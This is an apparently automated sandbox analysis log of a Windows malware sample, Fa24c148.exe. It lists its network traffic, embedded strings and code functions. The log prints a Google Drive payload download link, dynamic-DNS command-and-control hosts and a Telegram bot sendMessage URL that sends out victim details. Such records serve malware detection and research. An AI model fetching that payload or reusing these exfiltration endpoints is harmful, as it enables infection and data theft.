Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 11:22:50 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Fa24c148.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Fa24c148.exe, 00000004.00000002.2951440746.0000000033782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003377D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/o
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930879164.00000000049C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadal
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadle
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.0000000033637000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337B3000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000337A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405160
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_004031FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 4_2_004031FF
Creates files inside the system directory
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004063CC 0_2_004063CC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_0040499D 0_2_0040499D
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004063CC 4_2_004063CC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0040499D 4_2_0040499D
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016A088 4_2_0016A088
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C147 4_2_0016C147
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016D278 4_2_0016D278
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00165362 4_2_00165362
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C468 4_2_0016C468
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00166498 4_2_00166498
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016D548 4_2_0016D548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_001676F1 4_2_001676F1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C738 4_2_0016C738
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016E988 4_2_0016E988
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CA08 4_2_0016CA08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CCD8 4_2_0016CCD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CFAA 4_2_0016CFAA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00166FC8 4_2_00166FC8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016E97A 4_2_0016E97A
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016F961 4_2_0016F961
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00163E09 4_2_00163E09
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35782968 4_2_35782968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35789548 4_2_35789548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578FC68 4_2_3578FC68
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35785028 4_2_35785028
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_357817A0 4_2_357817A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578DE00 4_2_3578DE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35781E80 4_2_35781E80
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D550 4_2_3578D550
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D540 4_2_3578D540
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578DDF1 4_2_3578DDF1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D9A8 4_2_3578D9A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D999 4_2_3578D999
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780040 4_2_35780040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578003F 4_2_3578003F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35789C18 4_2_35789C18
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35785018 4_2_35785018
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578001B 4_2_3578001B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F810 4_2_3578F810
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F803 4_2_3578F803
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D0F8 4_2_3578D0F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578CCA0 4_2_3578CCA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EF60 4_2_3578EF60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EF51 4_2_3578EF51
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780B30 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780B20 4_2_35780B20
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EB08 4_2_3578EB08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F3B8 4_2_3578F3B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F3A8 4_2_3578F3A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35788BA0 4_2_35788BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578178F 4_2_3578178F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35781E70 4_2_35781E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E258 4_2_3578E258
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E24B 4_2_3578E24B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EAF8 4_2_3578EAF8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6B0 4_2_3578E6B0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6AF 4_2_3578E6AF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6A0 4_2_3578E6A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E681D0 4_2_35E681D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68FB0 4_2_35E68FB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B78 4_2_35E67B78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C9E8 4_2_35E6C9E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E615E8 4_2_35E615E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E615F8 4_2_35E615F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62FF9 4_2_35E62FF9
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E9C8 4_2_35E6E9C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E9D8 4_2_35E6E9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65BD8 4_2_35E65BD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C9D8 4_2_35E6C9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E611A0 4_2_35E611A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BA0 4_2_35E62BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68FA1 4_2_35E68FA1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BAF 4_2_35E62BAF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B7A8 4_2_35E6B7A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BB0 4_2_35E62BB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D787 4_2_35E6D787
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65780 4_2_35E65780
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F788 4_2_35E6F788
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D798 4_2_35E6D798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B798 4_2_35E6B798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B69 4_2_35E67B69
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B77 4_2_35E67B77
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65770 4_2_35E65770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F778 4_2_35E6F778
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E60D48 4_2_35E60D48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E548 4_2_35E6E548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C548 4_2_35E6C548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62749 4_2_35E62749
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C558 4_2_35E6C558
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62758 4_2_35E62758
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67720 4_2_35E67720
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65328 4_2_35E65328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6A928 4_2_35E6A928
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6A938 4_2_35E6A938
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E538 4_2_35E6E538
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B307 4_2_35E6B307
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62300 4_2_35E62300
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D308 4_2_35E6D308
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67710 4_2_35E67710
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6531B 4_2_35E6531B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B318 4_2_35E6B318
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F2E7 4_2_35E6F2E7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E608E0 4_2_35E608E0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D2F7 4_2_35E6D2F7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E608F0 4_2_35E608F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E622F0 4_2_35E622F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F2F8 4_2_35E6F2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E64EC0 4_2_35E64EC0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C0C8 4_2_35E6C0C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E672C8 4_2_35E672C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E64ED0 4_2_35E64ED0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E0A7 4_2_35E6E0A7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E638AC 4_2_35E638AC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E61EA8 4_2_35E61EA8
